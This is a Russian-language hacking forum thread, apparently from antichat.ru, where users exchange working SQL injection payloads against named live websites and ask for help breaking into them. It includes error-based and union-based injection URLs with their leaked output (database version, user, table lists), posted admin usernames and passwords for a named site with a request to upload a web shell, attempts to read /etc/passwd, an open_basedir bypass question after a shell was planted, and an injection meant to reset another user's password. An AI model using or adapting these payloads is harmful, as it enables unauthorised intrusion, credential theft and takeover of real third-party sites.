извиняюсь, не могли бы вы продемонстрировать метод из приведенной статьи на этом живом примере, который спросил ТС? Например для получения списка тех же таблиц из information_schema.tables
Разумеется: Code: http://mihadmin.ru/statpage.php?sid=-1+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+1,1),1,64),floor(rand(0)*2)))z) И в самом верху вижу: Duplicate entry 'COLLATIONS1' for key 1 З.Ы. Ну а дальше меняем значение в лимите, сам запрос в mid(...).
http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+version()),floor(rand(0)*2))+from+produ cts+group+by+2+limit+1)a) к сожалению не докрутил скуль в силу своей неопытности. Господа обьясните как через эту ошибку можно вывести названия столбцов. Так не вышло: http://www.gemreplica.com/about.php?cid=(select+1+from+(select+count(0),conc at((select+table_name),floor(rand(0)*2))+from+info rmation_schema.tables+group+by+2+limit+0,1)a
Ну вот только что обсуждали: Code: http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by%20concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z) плз внимательней
Кстати, фигня такая, типо мелочь, вот этих union+select+2 не обязательно должно соответствовать кол-ву колонок, главное чтобы их было => чем надо, причем > тут имеет ключевое значение, как оказалось в данном конкретном примере. Т.е. в итоге получается необязательно подбирать точное кол-во, жесть. т.е. ссылка выше выдаст тоже самое, что и такой вот запрос: Code: http://www.gemreplica.com/about.php?cid=(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z) И, что примечательно, это так и есть, и в итоге является наиболее крутым методом при проведении такого рода sql-injection, т.к. не требует ни точного подбора кол-ва столбцов, ни знания названия вообще какой-либо таблицы: Code: http://mihadmin.ru/statpage.php?sid=love'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3+union+select+3)x+group+by+concat(mid((select+version()+limit+0,1),1,64),floor(rand(0)*2)))z)--+ union+select+3 проставлено просто от балды много
Скажите пож-та в последней версии Firefox хочу посмотреть пароль через исходный код фрейма а он не показывает. Подскажите почему! Пароль хочу посмотреть на модеме! За ранее спасибки!
Есть админка: http://www.ettisalqatar.com/Admin admin:zameer8847 janak:info123 Помогите залить Shell.
Есть залитый шелл, но выбраться выше public_html нельзя из-за open_basedir. Но ls, cat и другие консольные команды работают и позволяют выбраться в public_html любого домена, висящего на этом хосте. В случае если доменов мало, можно просто слить еще один шелл в другой домен и разбираться уже через него, но когда доменов много... Поэтому: 1. Есть ли способы обойти open_basedir? (PHP 5.1.2) 2. Возможно бред, но есть ли веб-шелл, работающий практически полностью на одних консольных командах?
Набираю в Opera: http://www.ettisalqatar.com/cgi-script/test.pl http://www.ettisalqatar.com/cgi-bin/test.pl http://www.ettisalqatar.com/cgi-script/script.pl http://www.ettisalqatar.com/cgi-bin/script.pl Не могу найти shell. И, подскажите статью по заливке Perl Shell. Заранее всем спасибо.
Есть сайт, он подвержен SQL инъекции, знаю потому что получил лог и пас от админки, но толку с этого мало, так как встроеный в админку загрузчик переименовывает любой фаил по шаблону целиком в .gif Сервер же со своей стороны не дает возможности исполнять gif. Так же хостер (или админ) не дурак и прав у юзера SQL базы недостаточно на чтние /etc/password, выдает пустой экран, в смысле сюль рагирует позитивно но ничего не сгружает (проверял фаер багом на предмет скрытого теста, но пусто). Отсюда резонный вопрос, что посоветуете делать и как извернутся? чуть не забыл на сервере включенный магические кавычки, но CHAR не лечит, как впрочем 16чная система, прав нет. залить, через sql то же не получилось, возможно что то не так делаю, собственно сам линк инъекции в студии Code: http://www.site.ru/news.php?id=-99999999+union+select+load_file(0x2f6574632f706173737764),2,3 /* (попытка чтения етц) Если резюмировать, то вопросов 2а, как надуть загрузчик фаилов или как правильно залить шел через SQL (MySQL) Нe и конечно юзер скуль не роот(понятно почему он не читает /etc/passwd), ротового как найти незнаю, у хостера ниче так сайт я дырок ненашел... (mtw.ru)
Есть такой код: PHP: $nomer=$_POST["nomer"]; mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')"); К переменной присваиваю значение: PHP: <option value="2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /* ">двойка</option> Получается такой запрос: PHP: mysql_query("insert into tb_ref (user,nomer) values ('$user','2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*')"); но он не работает и ошибки нет никакой Какие данные отправлять в переменной $nomer что бы установить пароль 123 для username=GivioN ? Магик. квотес в положении off!
ZeroCold Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем GivioN Попробуй почитать что-то. Например про оператор union http://phpclub.ru/mysql/doc/union.html
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4+--+ 5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:debian-linux-gnu http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_concat(0x0b,table_name),4+from+information_schema.tables+--+ CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, article, const, group, group_refer, menu, news, rights, rights_refer, statpage, user
Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе. и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
https://forum.antichat.ru/showthread.php?t=56221 ON DUPLICATE KEY При прокачанной удаче хакера может сработать, хотя конечно... А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно
https://forum.antichat.ru/showpost.php?p=572143&postcount=10 =( если в переменную вставить это: ТО цель будет выполнена. Но не работает так как при отправке пост запроса отредактированного оперой получается такой код: <select name="nomer"> <option value="1">1 бла бла</option> <option value="2">2 бла бла</option> <option value="2')""); mysql_query("UPDATE tb_users SET password='123' WHERE username='GivioN'"); //">3 бла бла</option> </select><br><br></body></html> где третье значение имеет двойные ковычки и весь код не отправляется... Как можно надурить систему? Или InetCrack рулит в этом случаи?